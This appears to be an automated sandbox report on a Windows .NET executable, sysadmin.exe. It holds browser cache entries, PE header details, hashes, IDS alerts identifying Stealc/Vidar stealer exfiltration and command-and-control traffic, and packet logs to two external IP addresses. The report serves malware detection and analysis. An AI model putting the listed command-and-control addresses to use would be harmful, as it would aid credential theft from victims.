                                                                                                                                                                                                                                                          Chrome Cache Entry: 81

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):29
                                                                                                                                                                                                                                                          Entropy (8bit):3.9353986674667634
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:VQAOx/1n:VQAOd1n
                                                                                                                                                                                                                                                          MD5:6FED308183D5DFC421602548615204AF
                                                                                                                                                                                                                                                          SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                                                                                                                                                          SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                                                                                                                                                          SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          URL:https://www.google.com/async/newtab_promos
                                                                                                                                                                                                                                                          Preview:)]}'.{"update":{"promos":{}}}

                                                                                                                                                                                                                                                          Chrome Cache Entry: 82

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65531)
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):133193
                                                                                                                                                                                                                                                          Entropy (8bit):5.435819584912517
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3072:fhk2hK+G05hzyxT+BVAkYocAbrfuZUY2i6e:fHhZJy1JkYocAbrf6UY8e
                                                                                                                                                                                                                                                          MD5:CE7B6020FC8DAEA332F610F5386EB711
                                                                                                                                                                                                                                                          SHA1:9E4EE96C3E39C301E1A4CCE3EFEA7F2AD3B49C5C
                                                                                                                                                                                                                                                          SHA-256:B98F20A50733037C1C3F86E75BD24A2EFE5FD82F8FDF80729A78CEBAD0B2E71E
                                                                                                                                                                                                                                                          SHA-512:44C98138654D80B932CBFF177B54C4198AF836C41A0B8E2FC98BBF828846AE3B41A137A9F571077BC0241D3024BF27D00BD62923CF70CF1C71DEB6D69BEBC047
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                                                                                                                                                                                          Preview:)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

                                                                                                                                                                                                                                                          Chrome Cache Entry: 83

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1395)
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):117446
                                                                                                                                                                                                                                                          Entropy (8bit):5.490775275046353
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3072:T2yvefrtJUEgK3Cvw3wWs/ZuTZVL/G1kL:T2y4tJbDK0L/G1kL
                                                                                                                                                                                                                                                          MD5:942EA4F96889BAE7D3C59C0724AB2208
                                                                                                                                                                                                                                                          SHA1:033DDF473319500621D8EBB6961C4278E27222A7
                                                                                                                                                                                                                                                          SHA-256:F59F7F32422E311462A6A6307D90CA75FE87FA11E6D481534A6F28BFCCF63B03
                                                                                                                                                                                                                                                          SHA-512:C3F27662D08AA00ECBC910C39F6429C2F4CBC7CB5FC9083F63390047BACAF8CD7A83C3D6BBE7718F699DAE2ADA486F9E0CAED59BC3043491EECD9734EC32D92F
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          URL:"https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.l2ZUC8FxqV8.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo9xAAkaXO7Lqf7-9uTpZLtrkpWaXQ/cb=gapi.loaded_0"
                                                                                                                                                                                                                                                          Preview:gapi.loaded_0(function(_){var window=this;._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([]);.var ca,da,ha,ma,xa,Aa,Ba;ca=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};_.la=ha(this);ma=function(a,b){if(b)a:{var c=_.la;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}};.ma("Symbol",function(a){if(a)return a;var b

                                                                                                                                                                                                                                                          Chrome Cache Entry: 84

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (5162), with no line terminators
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):5162
                                                                                                                                                                                                                                                          Entropy (8bit):5.3503139230837595
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:lXTMb1db1hNY/cobkcsidqg3gcIOnAg8IF8uM8DvY:lXT0TGKiqggdaAg8IF8uM8DA
                                                                                                                                                                                                                                                          MD5:7977D5A9F0D7D67DE08DECF635B4B519
                                                                                                                                                                                                                                                          SHA1:4A66E5FC1143241897F407CEB5C08C36767726C1
                                                                                                                                                                                                                                                          SHA-256:FE8B69B644EDDE569DD7D7BC194434C57BCDF60280078E9F96EEAA5489C01F9D
                                                                                                                                                                                                                                                          SHA-512:8547AE6ACA1A9D74A70BF27E048AD4B26B2DC74525F8B70D631DA3940232227B596D56AB9807E2DCE96B0F5984E7993F480A35449F66EEFCF791A7428C5D0567
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          URL:"https://www.gstatic.com/og/_/ss/k=og.qtm.CEsjJf2wziM.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTvDtorsWuiBHYzP5-lS7pwgoAa95g"
                                                                                                                                                                                                                                                          Preview:.gb_P{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ja{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_Ka{fill:#f9ab00}.gb_F .gb_Ka{fill:#fdd663}.gb_La>.gb_Ka{fill:#d93025}.gb_F .gb_La>.gb_Ka{fill:#f28b82}.gb_La>.gb_Ma{fill:white}.gb_Ma,.gb_F .gb_La>.gb_Ma{fill:#202124}.gb_Na{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3

                                                                                                                                                                                                                                                          Chrome Cache Entry: 85

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):1660
                                                                                                                                                                                                                                                          Entropy (8bit):4.301517070642596
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
                                                                                                                                                                                                                                                          MD5:554640F465EB3ED903B543DAE0A1BCAC
                                                                                                                                                                                                                                                          SHA1:E0E6E2C8939008217EB76A3B3282CA75F3DC401A
                                                                                                                                                                                                                                                          SHA-256:99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
                                                                                                                                                                                                                                                          SHA-512:462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          URL:https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
                                                                                                                                                                                                                                                          Preview:<svg xmlns="http://www.w3.org/2000/svg" width="74" height="24" viewBox="0 0 74 24"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"/><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"/><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3

                                                                                                                                                                                                                                                          Static File Info

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                          Entropy (8bit):5.873577788279503
                                                                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                                                                                                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                                                                                                                          • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                                                                                          File name:sysadmin.exe
                                                                                                                                                                                                                                                          File size:1'662'464 bytes
                                                                                                                                                                                                                                                          MD5:e5f9640fb525c58fec8901b16f41c9a5
                                                                                                                                                                                                                                                          SHA1:eceb9a21a0805ae9c52e6cc5a38261664b4a108c
                                                                                                                                                                                                                                                          SHA256:f968314562778f694014b3c0c53af289f3a194386f7ad7a8167c1c6c838c29d0
                                                                                                                                                                                                                                                          SHA512:e995c2cae6f77fab3b7cb8aacd5e57814eee5c4e9a2b7fea87a6f98375f77a1f0a644bc86098ba916c966cfba634b03b6966dff5bf374744133fd6642378d2be
                                                                                                                                                                                                                                                          SSDEEP:24576:PtAz1abl1SKuKffScKhqgxoIEdjcc7H6apEfMseO3H+:jKTxoIEdjE
                                                                                                                                                                                                                                                          TLSH:3A756C917BE4CF27E66F7772803202682FF1E445A362E74B524462E99C4A7081E7937F
                                                                                                                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...G..g.....................^........... ... ....@.. ....................................`................................

                                                                                                                                                                                                                                                          File Icon

                                                                                                                                                                                                                                                          Icon Hash:8a8a8e92b2b29216

                                                                                                                                                                                                                                                          Static PE Info

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Entrypoint:0x591bb6
                                                                                                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                                                                                                          Digitally signed:false
                                                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE
                                                                                                                                                                                                                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                          Time Stamp:0x67819E47 [Fri Jan 10 22:25:11 2025 UTC]
                                                                                                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                                                                                                          OS Version Major:4
                                                                                                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                                                                                                          File Version Major:4
                                                                                                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                                                                                                          Subsystem Version Major:4
                                                                                                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                                                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                                                                                                                          Entrypoint Preview

                                                                                                                                                                                                                                                          Instruction
                                                                                                                                                                                                                                                          jmp dword ptr [00591BC4h]
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          cwde
                                                                                                                                                                                                                                                          sbb ebx, dword ptr [ecx]
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [edi-62h], al
                                                                                                                                                                                                                                                          and dword ptr [edi+00h], 02000000h
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [edx+00h], bh
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          call 00007FC82D196290h
                                                                                                                                                                                                                                                          std
                                                                                                                                                                                                                                                          sbb byte ptr [eax], al
                                                                                                                                                                                                                                                          push edx
                                                                                                                                                                                                                                                          push ebx
                                                                                                                                                                                                                                                          inc esp
                                                                                                                                                                                                                                                          push ebx
                                                                                                                                                                                                                                                          test dword ptr [edx-0Eh], ebp
                                                                                                                                                                                                                                                          xor eax, 4BC2FEA6h
                                                                                                                                                                                                                                                          mov bh, byte ptr [edi]
                                                                                                                                                                                                                                                          test al, 5Ch
                                                                                                                                                                                                                                                          fmul qword ptr [edi+0001ACA7h]
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          inc ebx
                                                                                                                                                                                                                                                          cmp bl, byte ptr [ebp+edx*2+73h]
                                                                                                                                                                                                                                                          jc 00007FC8451949E6h
                                                                                                                                                                                                                                                          pop esp
                                                                                                                                                                                                                                                          inc ecx
                                                                                                                                                                                                                                                          insd
                                                                                                                                                                                                                                                          imul ebp, dword ptr [esi+69h], 61727473h
                                                                                                                                                                                                                                                          je 00007FC8451949E1h
                                                                                                                                                                                                                                                          jc 00007FC8451949CEh
                                                                                                                                                                                                                                                          inc esp
                                                                                                                                                                                                                                                          jnc 00007FC8451949DEh
                                                                                                                                                                                                                                                          je 00007FC8451949E1h
                                                                                                                                                                                                                                                          jo 00007FC8451949CEh
                                                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                                                          insb
                                                                                                                                                                                                                                                          imul ebp, dword ptr [edi+73h], 70736944h
                                                                                                                                                                                                                                                          insb
                                                                                                                                                                                                                                                          popad
                                                                                                                                                                                                                                                          jns 00007FC8451949BFh
                                                                                                                                                                                                                                                          popad
                                                                                                                                                                                                                                                          outsb
                                                                                                                                                                                                                                                          popad
                                                                                                                                                                                                                                                          insd
                                                                                                                                                                                                                                                          outsb
                                                                                                                                                                                                                                                          je 00007FC84519499Fh
                                                                                                                                                                                                                                                          insd
                                                                                                                                                                                                                                                          popad
                                                                                                                                                                                                                                                          jnc 00007FC8451949E6h
                                                                                                                                                                                                                                                          jc 00007FC8451949CFh
                                                                                                                                                                                                                                                          push edx
                                                                                                                                                                                                                                                          insb
                                                                                                                                                                                                                                                          popad
                                                                                                                                                                                                                                                          jnc 00007FC8451949D7h
                                                                                                                                                                                                                                                          pop esp
                                                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                                                          insb
                                                                                                                                                                                                                                                          imul ebp, dword ptr [edi+73h], 70736944h
                                                                                                                                                                                                                                                          insb
                                                                                                                                                                                                                                                          popad
                                                                                                                                                                                                                                                          jns 00007FC8451949BFh
                                                                                                                                                                                                                                                          popad
                                                                                                                                                                                                                                                          outsb
                                                                                                                                                                                                                                                          popad
                                                                                                                                                                                                                                                          insd
                                                                                                                                                                                                                                                          outsb
                                                                                                                                                                                                                                                          je 00007FC8451949A0h
                                                                                                                                                                                                                                                          jo 00007FC8451949D6h
                                                                                                                                                                                                                                                          bound eax, dword ptr [eax]
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                                          add byte ptr [eax], al

                                                                                                                                                                                                                                                          Data Directories

                                                                                                                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x191b680x4c.text
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x1920000x5a34.rsrc
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x1980000xc.reloc
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x191bcc0x1c.text
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x191bc40x8.text
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                          Sections

                                                                                                                                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                          .text0x20000x18fc620x18fe00d1f4482ac2fe54c69984f60f0ac75bf4False0.33139445432166303data5.876147331303124IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                          .rsrc0x1920000x5a340x5c00f40392486883bccd89b63928f60888ecFalse0.173828125data4.703752017812387IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                          .reloc0x1980000xc0x2004c2d0d2d8af8313092cc4fd33ef2fe94False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                                          Resources

                                                                                                                                                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                          RT_ICON0x1921a00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors0.1329479768786127
                                                                                                                                                                                                                                                          RT_ICON0x1927180x86ePNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.8049119555143651
                                                                                                                                                                                                                                                          RT_ICON0x192f960x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 96000.05829875518672199
                                                                                                                                                                                                                                                          RT_ICON0x19554e0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 42240.07410881801125703
                                                                                                                                                                                                                                                          RT_ICON0x1966060x988Device independent bitmap graphic, 24 x 48 x 32, image size 24000.11639344262295082
                                                                                                                                                                                                                                                          RT_ICON0x196f9e0x468Device independent bitmap graphic, 16 x 32 x 32, image size 10880.1773049645390071
                                                                                                                                                                                                                                                          RT_GROUP_ICON0x1974160x5adata0.7444444444444445
                                                                                                                                                                                                                                                          RT_VERSION0x1974800x3badata0.4025157232704403
                                                                                                                                                                                                                                                          RT_MANIFEST0x19784a0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                                                                                                                                                                                          Imports

                                                                                                                                                                                                                                                          DLLImport
                                                                                                                                                                                                                                                          mscoree.dll_CorExeMain

                                                                                                                                                                                                                                                          Network Behavior

                                                                                                                                                                                                                                                          Suricata IDS Alerts

                                                                                                                                                                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                          2025-01-13T20:18:11.292842+01002859378ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M21192.168.2.449733116.203.166.124443TCP
                                                                                                                                                                                                                                                          2025-01-13T20:18:12.636616+01002049087ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M11192.168.2.449734116.203.166.124443TCP
                                                                                                                                                                                                                                                          2025-01-13T20:18:13.977147+01002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config1116.203.166.124443192.168.2.449735TCP
                                                                                                                                                                                                                                                          2025-01-13T20:18:15.337689+01002051831ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M11116.203.166.124443192.168.2.449736TCP

                                                                                                                                                                                                                                                          Network Port Distribution

                                                                                                                                                                                                                                                          TCP Packets

                                                                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:03.284168959 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:03.289354086 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:03.289433956 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:03.303745985 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:03.308636904 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:03.308650970 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:03.308664083 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:03.947798014 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:03.947825909 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:03.947981119 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:04.980456114 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:04.985744953 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:05.649131060 CET49675443192.168.2.4173.222.162.32
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.465811968 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.467659950 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.467695951 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.467730045 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.467732906 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.467761993 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.467797041 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.467804909 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.467829943 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.467850924 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.467864037 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.467897892 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.467931032 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.476892948 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.476927042 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.476959944 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.476962090 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.476993084 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.477003098 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.477026939 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.477089882 CET497307777192.168.2.485.192.63.194
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.561753988 CET77774973085.192.63.194192.168.2.4
                                                                                                                                                                                                                                                          Jan 13, 2025 20:18:06.561803102 CET77774973085.192.63.194192.168.2.4
